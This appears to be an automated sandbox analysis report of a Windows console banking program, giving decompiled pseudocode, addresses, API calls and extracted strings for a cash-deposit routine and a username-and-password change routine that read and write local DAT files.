                                                                      				_push("Confirm Transaction");
                                                                      				_t57 = E00BE715C(_t101, _t135, _t136, __eflags);
                                                                      				asm("movss xmm0, [ebp-0x8]");
                                                                      				asm("movss [esp], xmm0");
                                                                      				E00BE1870(_t57,  &_v280);
                                                                      				E00BE12B0(3, 0xc);
                                                                      				_push( &_v244);
                                                                      				_push( &_v28);
                                                                      				E00BE715C(_t101, _t135, _t136, __eflags);
                                                                      				asm("cvtss2sd xmm0, [ebp-0x8]");
                                                                      				asm("movsd [esp], xmm0");
                                                                      				E00BE1B30( &_v440, "%s to be deposited in A/C number : %s [ %s ]",  &_v280);
                                                                      				E00BE8140( &_v360,  &_v440);
                                                                      				E00BE8140( &_v360, "]");
                                                                      				E00BE12B0(0x28 - (E00BE82C0( &_v360) >> 1), 0xe);
                                                                      				_push( &_v360);
                                                                      				E00BE7229(_t101, _t135, _t136, __eflags);
                                                                      				E00BE12B0(8, 0x11);
                                                                      				_push("Are you sure you want to perform this tranasction? <Y/N>");
                                                                      				E00BE715C(_t101, _t135, _t136, __eflags);
                                                                      				_t151 = _t141 + 0x24 - 8 + 0x1c;
                                                                      				_t73 = _v5;
                                                                      				__eflags = _t73 - 0x59;
                                                                      				if(_t73 == 0x59) {
                                                                      					L4:
                                                                      					 *0xc02f28 = E00BE6EF1("ACCOUNT.DAT", "r");
                                                                      					_t75 = E00BE6EF1("TEMP.DAT", "a");
                                                                      					_t153 = _t151 + 0x10;
                                                                      					 *0xc02f24 = _t75;
                                                                      					while(1) {
                                                                      						_push( &_v32);
                                                                      						_push( &_v36);
                                                                      						_push( &_v40);
                                                                      						_push( &_v42);
                                                                      						_push( &_v140);
                                                                      						_push( &_v113);
                                                                      						_push( &_v62);
                                                                      						_push( &_v112);
                                                                      						_push( &_v125);
                                                                      						_push( &_v170);
                                                                      						_push( &_v200);
                                                                      						_t129 =  *0xc02f28; // 0x0
                                                                      						_t80 = E00BE7021(_t129, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                                      						_t154 = _t153 + 0x38;
                                                                      						__eflags = _t80 - 0xffffffff;
                                                                      						if(__eflags == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t93 = E00BE8230( &_v208,  &_v28);
                                                                      						_t163 = _t154 + 8;
                                                                      						__eflags = _t93;
                                                                      						if(__eflags == 0) {
                                                                      							asm("movss xmm0, [ebp-0x24]");
                                                                      							asm("addss xmm0, [ebp-0x8]");
                                                                      							asm("movss [ebp-0x24], xmm0");
                                                                      						}
                                                                      						asm("movss xmm0, [ebp-0x24]");
                                                                      						asm("addss xmm0, [ebp-0x20]");
                                                                      						asm("movss [ebp-0x1c], xmm0");
                                                                      						asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                                      						asm("movsd [esp], xmm0");
                                                                      						asm("cvtss2sd xmm0, [ebp-0x20]");
                                                                      						asm("movsd [esp], xmm0");
                                                                      						asm("cvtss2sd xmm0, [ebp-0x24]");
                                                                      						asm("movsd [esp], xmm0");
                                                                      						_push(_v42);
                                                                      						_push( &_v140);
                                                                      						_push(_v113);
                                                                      						_push( &_v62);
                                                                      						_push( &_v112);
                                                                      						_push( &_v125);
                                                                      						_push( &_v170);
                                                                      						_push( &_v200);
                                                                      						_push( &_v208);
                                                                      						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
                                                                      						_t134 =  *0xc02f24; // 0x0
                                                                      						_push(_t134);
                                                                      						E00BE6F06(_t101, _t135, _t136, __eflags);
                                                                      						_t153 = _t163 - 0xfffffffffffffff8 + 0x44;
                                                                      					}
                                                                      					_t81 =  *0xc02f24; // 0x0
                                                                      					_push(_t81);
                                                                      					E00BE6DB6(_t101, _t135, _t136, __eflags);
                                                                      					_t113 =  *0xc02f28; // 0x0
                                                                      					_push(_t113);
                                                                      					E00BE6DB6(_t101, _t135, _t136, __eflags);
                                                                      					 *0xc02f28 = E00BE6EF1("TRANSACTION.DAT", "a");
                                                                      					E00BE8417(__eflags, 0xc02f30);
                                                                      					_push(0xc02ee4);
                                                                      					asm("cvtss2sd xmm0, [ebp-0x8]");
                                                                      					asm("movsd [esp], xmm0");
                                                                      					_push(0xc02f30);
                                                                      					_push(0xc02f40);
                                                                      					_push("Cash+Deposited");
                                                                      					_push( &_v28);
                                                                      					_push("%s %s %s %s %.2f %s\n");
                                                                      					_t86 =  *0xc02f28; // 0x0
                                                                      					_push(_t86);
                                                                      					E00BE6F06(_t101, _t135, _t136, __eflags);
                                                                      					_t114 =  *0xc02f28; // 0x0
                                                                      					_push(_t114);
                                                                      					E00BE6DB6(_t101, _t135, _t136, __eflags);
                                                                      					E00BE20E0(_t114, _t135, _t136, __eflags, _t170);
                                                                      					E00BE12B0(0x14, 0xc);
                                                                      					_push("Transaction completed successfully!");
                                                                      					return E00BE715C(_t101, _t135, _t136, __eflags);
                                                                      				}
                                                                      				__eflags = _v5 - 0x79;
                                                                      				if(_v5 == 0x79) {
                                                                      					goto L4;
                                                                      				}
                                                                      				return _t73;
                                                                      			}










































                                                                      0x00be4640
                                                                      0x00be4640
                                                                      0x00be4640
                                                                      0x00be4640
                                                                      0x00be4640
                                                                      0x00be4649
                                                                      0x00be4650
                                                                      0x00be4659
                                                                      0x00be465e
                                                                      0x00be4663
                                                                      0x00be4674
                                                                      0x00be468e
                                                                      0x00be4693
                                                                      0x00be4699
                                                                      0x00be469a
                                                                      0x00be469f
                                                                      0x00be46a2
                                                                      0x00be46a6
                                                                      0x00be46a8
                                                                      0x00be46b1
                                                                      0x00be46b6
                                                                      0x00000000
                                                                      0x00be46c0
                                                                      0x00be46cc
                                                                      0x00be46d7
                                                                      0x00be46d8
                                                                      0x00be46dd
                                                                      0x00be46e9
                                                                      0x00be46ee
                                                                      0x00be46f3
                                                                      0x00be4704
                                                                      0x00be470c
                                                                      0x00be4715
                                                                      0x00be471a
                                                                      0x00be471f
                                                                      0x00be4724
                                                                      0x00be4729
                                                                      0x00be4735
                                                                      0x00be473e
                                                                      0x00be4749
                                                                      0x00be474d
                                                                      0x00be475a
                                                                      0x00be4769
                                                                      0x00be4771
                                                                      0x00be4776
                                                                      0x00be4789
                                                                      0x00be479d
                                                                      0x00be47c0
                                                                      0x00be47cb
                                                                      0x00be47cc
                                                                      0x00be47d8
                                                                      0x00be47dd
                                                                      0x00be47e2
                                                                      0x00be47e7
                                                                      0x00be47ea
                                                                      0x00be47ee
                                                                      0x00be47f1
                                                                      0x00be4800
                                                                      0x00be4812
                                                                      0x00be4821
                                                                      0x00be4826
                                                                      0x00be4829
                                                                      0x00be482e
                                                                      0x00be4831
                                                                      0x00be4835
                                                                      0x00be4839
                                                                      0x00be483d
                                                                      0x00be4844
                                                                      0x00be4848
                                                                      0x00be484c
                                                                      0x00be4850
                                                                      0x00be4854
                                                                      0x00be485b
                                                                      0x00be4862
                                                                      0x00be486f
                                                                      0x00be4876
                                                                      0x00be487b
                                                                      0x00be487e
                                                                      0x00be4881
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be4892
                                                                      0x00be4897
                                                                      0x00be489a
                                                                      0x00be489c
                                                                      0x00be489e
                                                                      0x00be48a3
                                                                      0x00be48a8
                                                                      0x00be48a8
                                                                      0x00be48ad
                                                                      0x00be48b2
                                                                      0x00be48b7
                                                                      0x00be48bc
                                                                      0x00be48c4
                                                                      0x00be48c9
                                                                      0x00be48d1
                                                                      0x00be48d6
                                                                      0x00be48de
                                                                      0x00be48e7
                                                                      0x00be48ee
                                                                      0x00be48f3
                                                                      0x00be48f7
                                                                      0x00be48fb
                                                                      0x00be48ff
                                                                      0x00be4906
                                                                      0x00be490d
                                                                      0x00be4914
                                                                      0x00be4915
                                                                      0x00be491a
                                                                      0x00be4920
                                                                      0x00be4921
                                                                      0x00be4926
                                                                      0x00be4926
                                                                      0x00be492e
                                                                      0x00be4933
                                                                      0x00be4934
                                                                      0x00be493c
                                                                      0x00be4942
                                                                      0x00be4943
                                                                      0x00be495d
                                                                      0x00be4967
                                                                      0x00be496f
                                                                      0x00be4974
                                                                      0x00be497c
                                                                      0x00be4981
                                                                      0x00be4986
                                                                      0x00be498b
                                                                      0x00be4993
                                                                      0x00be4994
                                                                      0x00be4999
                                                                      0x00be499e
                                                                      0x00be499f
                                                                      0x00be49a7
                                                                      0x00be49ad
                                                                      0x00be49ae
                                                                      0x00be49b6
                                                                      0x00be49bf
                                                                      0x00be49c4
                                                                      0x00000000
                                                                      0x00be49ce
                                                                      0x00be47f7
                                                                      0x00be47fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be49d4

                                                                      APIs
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE20FF
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE213E
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE215F
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE216C
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2188
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE2195
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE21C8
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE4663
                                                                      • _wscanf.LIBCMT ref: 00BE4674
                                                                        • Part of subcall function 00BE738B: _vwscanf.LIBCMT ref: 00BE739C
                                                                        • Part of subcall function 00BE6EF1: __fsopen.LIBCMT ref: 00BE6EFC
                                                                      • _wprintf.LIBCMT ref: 00BE46BB
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                      • _wprintf.LIBCMT ref: 00BE46DD
                                                                      • _wprintf.LIBCMT ref: 00BE46F3
                                                                      • _wscanf.LIBCMT ref: 00BE4704
                                                                      • _wprintf.LIBCMT ref: 00BE471F
                                                                      • _wprintf.LIBCMT ref: 00BE475A
                                                                      • _wprintf.LIBCMT ref: 00BE47E2
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2152
                                                                      Strings
                                                                      • TRANSACTION.DAT, xrefs: 00BE4950
                                                                      • Confirm Transaction, xrefs: 00BE471A
                                                                      • TEMP.DAT, xrefs: 00BE481C
                                                                      • Cash+Deposited, xrefs: 00BE498B
                                                                      • ACCOUNT.DAT, xrefs: 00BE4681
                                                                      • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 00BE4915
                                                                      • %s to be deposited in A/C number : %s [ %s ], xrefs: 00BE4755
                                                                      • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00BE486A
                                                                      • Given A/C number does not exits!, xrefs: 00BE46B6
                                                                      • [ %s ], xrefs: 00BE46D8
                                                                      • ACCOUNT.DAT, xrefs: 00BE4805
                                                                      • %s %s %s %s %.2f %s, xrefs: 00BE4994
                                                                      • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 00BE47DD
                                                                      • Deposit to A/C number : , xrefs: 00BE465E
                                                                      • Amount to be Deposited (in NRs.) : , xrefs: 00BE46EE
                                                                      • Transaction completed successfully!, xrefs: 00BE49C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vwscanf
                                                                      • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be deposited in A/C number : %s [ %s ]$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Deposited (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Deposited$Confirm Transaction$Deposit to A/C number : $Given A/C number does not exits!$TEMP.DAT$TRANSACTION.DAT$Transaction completed successfully!$[ %s ]
                                                                      • API String ID: 532294799-930819241
                                                                      • Opcode ID: 97849645ca55ea26cc1361987be7f185d4f729bde38534040ef8921564494f9b
                                                                      • Instruction ID: 91b9e05aa28301d3b6062b5bd39797219f6aa61fd994a3d3f60cd6d89fdea249
                                                                      • Opcode Fuzzy Hash: 97849645ca55ea26cc1361987be7f185d4f729bde38534040ef8921564494f9b
                                                                      • Instruction Fuzzy Hash: F691B1B2D503496BDB11EBE58C43FDE73B89B19740F0182A9F605750C2FB706648CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E00BE2B10(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                      				char _v5;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				char _v19;
                                                                      				char _v23;
                                                                      				char _v27;
                                                                      				char _v31;
                                                                      				char _v35;
                                                                      				char _v39;
                                                                      				char _v43;
                                                                      				char _v47;
                                                                      				char _v48;
                                                                      				char _v51;
                                                                      				char _v55;
                                                                      				char _v59;
                                                                      				char _v63;
                                                                      				char _v67;
                                                                      				char _v71;
                                                                      				char _v75;
                                                                      				char _v79;
                                                                      				char _v80;
                                                                      				char _v83;
                                                                      				char _v87;
                                                                      				char _v91;
                                                                      				char _v95;
                                                                      				char _v99;
                                                                      				char _v103;
                                                                      				char _v107;
                                                                      				char _v111;
                                                                      				char _v112;
                                                                      				char _v144;
                                                                      				char _v176;
                                                                      				char _v208;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t66;
                                                                      				intOrPtr _t67;
                                                                      				void* _t68;
                                                                      				intOrPtr _t84;
                                                                      				intOrPtr _t86;
                                                                      				intOrPtr _t87;
                                                                      				void* _t88;
                                                                      				intOrPtr _t89;
                                                                      				intOrPtr _t95;
                                                                      				intOrPtr _t98;
                                                                      				intOrPtr _t105;
                                                                      				char _t106;
                                                                      				void* _t109;
                                                                      				void* _t110;
                                                                      				intOrPtr _t119;
                                                                      				intOrPtr _t130;
                                                                      				intOrPtr _t132;
                                                                      				void* _t136;
                                                                      				void* _t140;
                                                                      				void* _t141;
                                                                      				void* _t142;
                                                                      				void* _t143;
                                                                      				void* _t149;
                                                                      				void* _t150;
                                                                      				void* _t154;
                                                                      
                                                                      				_t161 = __fp0;
                                                                      				_t135 = __esi;
                                                                      				_t134 = __edi;
                                                                      				_t113 = __ebx;
                                                                      				_v48 = 0;
                                                                      				_v47 = 0;
                                                                      				_v43 = 0;
                                                                      				_v39 = 0;
                                                                      				_v35 = 0;
                                                                      				_v31 = 0;
                                                                      				_v27 = 0;
                                                                      				_v23 = 0;
                                                                      				_v19 = 0;
                                                                      				_v112 = 0;
                                                                      				_v111 = 0;
                                                                      				_v107 = 0;
                                                                      				_v103 = 0;
                                                                      				_v99 = 0;
                                                                      				_v95 = 0;
                                                                      				_v91 = 0;
                                                                      				_v87 = 0;
                                                                      				_v83 = 0;
                                                                      				_v80 = 0;
                                                                      				_v79 = 0;
                                                                      				_v75 = 0;
                                                                      				_v71 = 0;
                                                                      				_v67 = 0;
                                                                      				_v63 = 0;
                                                                      				_v59 = 0;
                                                                      				_v55 = 0;
                                                                      				_v51 = 0;
                                                                      				_v16 = 0;
                                                                      				_v12 = 0;
                                                                      				E00BE20E0(0, __edi, __esi, 0, __fp0);
                                                                      				E00BE12B0(0x19, 8);
                                                                      				_push("User Name  : ");
                                                                      				E00BE715C(__ebx, __edi, __esi, 0);
                                                                      				E00BE738B("%s", 0xc02ee4);
                                                                      				E00BE12B0(0x19, 0xa);
                                                                      				_push("Password  : ");
                                                                      				E00BE715C(__ebx, __edi, __esi, 0);
                                                                      				E00BE12F0(_t134, _t135,  &_v112);
                                                                      				_t66 = E00BE6EF1("USER.DAT", "r");
                                                                      				_t140 = _t136 + 0x18;
                                                                      				 *0xc02f28 = _t66;
                                                                      				while(1) {
                                                                      					_push( &_v144);
                                                                      					_push( &_v176);
                                                                      					_t67 =  *0xc02f28; // 0x0
                                                                      					_t68 = E00BE7021(_t67, "%s %s %s\n", 0xc02ee0);
                                                                      					_t141 = _t140 + 0x14;
                                                                      					if(_t68 == 0xffffffff) {
                                                                      						break;
                                                                      					}
                                                                      					_t109 = E00BE8230(0xc02ee4,  &_v176);
                                                                      					_t140 = _t141 + 8;
                                                                      					if(_t109 == 0) {
                                                                      						_t110 = E00BE8230(0xc02f02,  &_v144);
                                                                      						_t140 = _t140 + 8;
                                                                      						if(_t110 == 0) {
                                                                      							_v16 = _v16 + 1;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t116 =  *0xc02f28; // 0x0
                                                                      				_push(_t116);
                                                                      				E00BE6DB6(_t113, _t134, _t135, __eflags);
                                                                      				_t142 = _t141 + 4;
                                                                      				E00BE20E0(_t116, _t134, _t135, __eflags, _t161);
                                                                      				__eflags = _v16;
                                                                      				if(__eflags != 0) {
                                                                      					E00BE12B0(8, 0xa);
                                                                      					_push("Are you sure you want to CHANGE user name and/or password? <Y/N> : ");
                                                                      					E00BE715C(_t113, _t134, _t135, __eflags);
                                                                      					_t143 = _t142 + 4;
                                                                      					__eflags = _v5 - 0x59;
                                                                      					if(__eflags == 0) {
                                                                      						do {
                                                                      							L10:
                                                                      							E00BE20E0(_t116, _t134, _t135, __eflags, _t161);
                                                                      							_v12 = 0;
                                                                      							E00BE12B0(0x19, 8);
                                                                      							_push("NEW User Name        : ");
                                                                      							E00BE715C(_t113, _t134, _t135, __eflags);
                                                                      							E00BE738B("%s",  &_v208);
                                                                      							E00BE12B0(0x19, 0xa);
                                                                      							_push("NEW Password         : ");
                                                                      							E00BE715C(_t113, _t134, _t135, __eflags);
                                                                      							E00BE12F0(_t134, _t135,  &_v48);
                                                                      							E00BE12B0(0x19, 0xc);
                                                                      							_push("Confirm NEW Password : ");
                                                                      							E00BE715C(_t113, _t134, _t135, __eflags);
                                                                      							E00BE12F0(_t134, _t135,  &_v80);
                                                                      							_t116 =  &_v80;
                                                                      							_t84 = E00BE8230( &_v48,  &_v80);
                                                                      							_t143 = _t143 + 0x1c;
                                                                      							__eflags = _t84;
                                                                      							if(__eflags != 0) {
                                                                      								E00BE20E0( &_v80, _t134, _t135, __eflags, _t161);
                                                                      								E00BE12B0(0xa, 0xa);
                                                                      								_push(0xbff710);
                                                                      								E00BE715C(_t113, _t134, _t135, __eflags);
                                                                      								_t143 = _t143 + 4;
                                                                      								_t105 = _v12 + 1;
                                                                      								__eflags = _t105;
                                                                      								_v12 = _t105;
                                                                      							}
                                                                      							__eflags = _v12;
                                                                      						} while (__eflags != 0);
                                                                      						 *0xc02f28 = E00BE6EF1("USER.DAT", 0xbff740);
                                                                      						_t86 = E00BE6EF1("temp.dat", "a");
                                                                      						_t149 = _t143 + 0x10;
                                                                      						 *0xc02f20 = _t86;
                                                                      						while(1) {
                                                                      							_push( &_v144);
                                                                      							_push( &_v176);
                                                                      							_t87 =  *0xc02f28; // 0x0
                                                                      							_t88 = E00BE7021(_t87, "%s %s %s\n", 0xc02ee0);
                                                                      							_t150 = _t149 + 0x14;
                                                                      							__eflags = _t88 - 0xffffffff;
                                                                      							if(__eflags == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t95 = E00BE8230(0xc02ee4,  &_v176);
                                                                      							_t154 = _t150 + 8;
                                                                      							__eflags = _t95;
                                                                      							if(__eflags != 0) {
                                                                      								L17:
                                                                      								_push( &_v144);
                                                                      								_push( &_v176);
                                                                      								_push(0xc02ee0);
                                                                      								_push("%s %s %s\n");
                                                                      								_t130 =  *0xc02f20; // 0x0
                                                                      								_push(_t130);
                                                                      								E00BE6F06(_t113, _t134, _t135, __eflags);
                                                                      								_t149 = _t154 + 0x14;
                                                                      								L19:
                                                                      								continue;
                                                                      							}
                                                                      							_t98 = E00BE8230(0xc02f02,  &_v144);
                                                                      							_t154 = _t154 + 8;
                                                                      							__eflags = _t98;
                                                                      							if(__eflags == 0) {
                                                                      								_push( &_v48);
                                                                      								_push( &_v208);
                                                                      								_push(0xc02ee0);
                                                                      								_push("%s %s %s\n");
                                                                      								_t132 =  *0xc02f20; // 0x0
                                                                      								_push(_t132);
                                                                      								E00BE6F06(_t113, _t134, _t135, __eflags);
                                                                      								_t149 = _t154 + 0x14;
                                                                      								goto L19;
                                                                      							}
                                                                      							goto L17;
                                                                      						}
                                                                      						_t89 =  *0xc02f28; // 0x0
                                                                      						_push(_t89);
                                                                      						E00BE6DB6(_t113, _t134, _t135, __eflags);
                                                                      						_t119 =  *0xc02f20; // 0x0
                                                                      						_push(_t119);
                                                                      						E00BE6DB6(_t113, _t134, _t135, __eflags);
                                                                      						E00BE20E0(_t119, _t134, _t135, __eflags, _t161);
                                                                      						E00BE12B0(0x19, 0xa);
                                                                      						_push("Record has been EDITED successfully!");
                                                                      						return E00BE715C(_t113, _t134, _t135, __eflags);
                                                                      					}
                                                                      					_t106 = _v5;
                                                                      					__eflags = _t106 - 0x79;
                                                                      					if(__eflags != 0) {
                                                                      						return _t106;
                                                                      					}
                                                                      					goto L10;
                                                                      				}
                                                                      				E00BE12B0(0xa, 0xa);
                                                                      				_push(0xbff640);
                                                                      				return E00BE715C(_t113, _t134, _t135, __eflags);
                                                                      			}






























































                                                                      0x00be2b10
                                                                      0x00be2b10
                                                                      0x00be2b10
                                                                      0x00be2b10
                                                                      0x00be2b19
                                                                      0x00be2b1f
                                                                      0x00be2b22
                                                                      0x00be2b25
                                                                      0x00be2b28
                                                                      0x00be2b2b
                                                                      0x00be2b2e
                                                                      0x00be2b31
                                                                      0x00be2b34
                                                                      0x00be2b37
                                                                      0x00be2b3d
                                                                      0x00be2b40
                                                                      0x00be2b43
                                                                      0x00be2b46
                                                                      0x00be2b49
                                                                      0x00be2b4c
                                                                      0x00be2b4f
                                                                      0x00be2b52
                                                                      0x00be2b55
                                                                      0x00be2b5b
                                                                      0x00be2b5e
                                                                      0x00be2b61
                                                                      0x00be2b64
                                                                      0x00be2b67
                                                                      0x00be2b6a
                                                                      0x00be2b6d
                                                                      0x00be2b70
                                                                      0x00be2b73
                                                                      0x00be2b7a
                                                                      0x00be2b81
                                                                      0x00be2b8a
                                                                      0x00be2b8f
                                                                      0x00be2b94
                                                                      0x00be2ba6
                                                                      0x00be2bb2
                                                                      0x00be2bb7
                                                                      0x00be2bbc
                                                                      0x00be2bc8
                                                                      0x00be2bd7
                                                                      0x00be2bdc
                                                                      0x00be2bdf
                                                                      0x00be2be4
                                                                      0x00be2bea
                                                                      0x00be2bf1
                                                                      0x00be2bfc
                                                                      0x00be2c02
                                                                      0x00be2c07
                                                                      0x00be2c0d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2c1b
                                                                      0x00be2c20
                                                                      0x00be2c25
                                                                      0x00be2c33
                                                                      0x00be2c38
                                                                      0x00be2c3d
                                                                      0x00be2c45
                                                                      0x00be2c45
                                                                      0x00be2c3d
                                                                      0x00be2c48
                                                                      0x00be2c4a
                                                                      0x00be2c50
                                                                      0x00be2c51
                                                                      0x00be2c56
                                                                      0x00be2c59
                                                                      0x00be2c5e
                                                                      0x00be2c62
                                                                      0x00be2c83
                                                                      0x00be2c88
                                                                      0x00be2c8d
                                                                      0x00be2c92
                                                                      0x00be2c99
                                                                      0x00be2c9c
                                                                      0x00be2cab
                                                                      0x00be2cab
                                                                      0x00be2cab
                                                                      0x00be2cb0
                                                                      0x00be2cbb
                                                                      0x00be2cc0
                                                                      0x00be2cc5
                                                                      0x00be2cd9
                                                                      0x00be2ce5
                                                                      0x00be2cea
                                                                      0x00be2cef
                                                                      0x00be2cfb
                                                                      0x00be2d04
                                                                      0x00be2d09
                                                                      0x00be2d0e
                                                                      0x00be2d1a
                                                                      0x00be2d1f
                                                                      0x00be2d27
                                                                      0x00be2d2c
                                                                      0x00be2d2f
                                                                      0x00be2d31
                                                                      0x00be2d33
                                                                      0x00be2d3c
                                                                      0x00be2d41
                                                                      0x00be2d46
                                                                      0x00be2d4b
                                                                      0x00be2d51
                                                                      0x00be2d51
                                                                      0x00be2d54
                                                                      0x00be2d54
                                                                      0x00be2d57
                                                                      0x00be2d57
                                                                      0x00be2d73
                                                                      0x00be2d82
                                                                      0x00be2d87
                                                                      0x00be2d8a
                                                                      0x00be2d8f
                                                                      0x00be2d95
                                                                      0x00be2d9c
                                                                      0x00be2da7
                                                                      0x00be2dad
                                                                      0x00be2db2
                                                                      0x00be2db5
                                                                      0x00be2db8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2dca
                                                                      0x00be2dcf
                                                                      0x00be2dd2
                                                                      0x00be2dd4
                                                                      0x00be2dee
                                                                      0x00be2df4
                                                                      0x00be2dfb
                                                                      0x00be2dfc
                                                                      0x00be2e01
                                                                      0x00be2e06
                                                                      0x00be2e0c
                                                                      0x00be2e0d
                                                                      0x00be2e12
                                                                      0x00be2e3b
                                                                      0x00000000
                                                                      0x00be2e3b
                                                                      0x00be2de2
                                                                      0x00be2de7
                                                                      0x00be2dea
                                                                      0x00be2dec
                                                                      0x00be2e1a
                                                                      0x00be2e21
                                                                      0x00be2e22
                                                                      0x00be2e27
                                                                      0x00be2e2c
                                                                      0x00be2e32
                                                                      0x00be2e33
                                                                      0x00be2e38
                                                                      0x00000000
                                                                      0x00be2e38
                                                                      0x00000000
                                                                      0x00be2dec
                                                                      0x00be2e40
                                                                      0x00be2e45
                                                                      0x00be2e46
                                                                      0x00be2e4e
                                                                      0x00be2e54
                                                                      0x00be2e55
                                                                      0x00be2e5d
                                                                      0x00be2e66
                                                                      0x00be2e6b
                                                                      0x00000000
                                                                      0x00be2e75
                                                                      0x00be2c9e
                                                                      0x00be2ca2
                                                                      0x00be2ca5
                                                                      0x00be2e7b
                                                                      0x00be2e7b
                                                                      0x00000000
                                                                      0x00be2ca5
                                                                      0x00be2c68
                                                                      0x00be2c6d
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE20FF
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE213E
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE215F
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE216C
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2188
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE2195
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE21C8
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE2B94
                                                                      • _wscanf.LIBCMT ref: 00BE2BA6
                                                                        • Part of subcall function 00BE738B: _vwscanf.LIBCMT ref: 00BE739C
                                                                      • _wprintf.LIBCMT ref: 00BE2BBC
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                        • Part of subcall function 00BE12F0: _wprintf.LIBCMT ref: 00BE1329
                                                                        • Part of subcall function 00BE6EF1: __fsopen.LIBCMT ref: 00BE6EFC
                                                                      • _swscanf.LIBCMT ref: 00BE2C02
                                                                        • Part of subcall function 00BE7021: _vfscanf.LIBCMT ref: 00BE7035
                                                                      • _wprintf.LIBCMT ref: 00BE2C72
                                                                      • _wprintf.LIBCMT ref: 00BE2C8D
                                                                      • _wprintf.LIBCMT ref: 00BE2CC5
                                                                      • _wscanf.LIBCMT ref: 00BE2CD9
                                                                      • _wprintf.LIBCMT ref: 00BE2CEF
                                                                      • _wprintf.LIBCMT ref: 00BE2D0E
                                                                      • _wprintf.LIBCMT ref: 00BE2D46
                                                                      • _swscanf.LIBCMT ref: 00BE2DAD
                                                                      • _fprintf.LIBCMT ref: 00BE2E0D
                                                                      • _fprintf.LIBCMT ref: 00BE2E33
                                                                      • _wprintf.LIBCMT ref: 00BE2E70
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
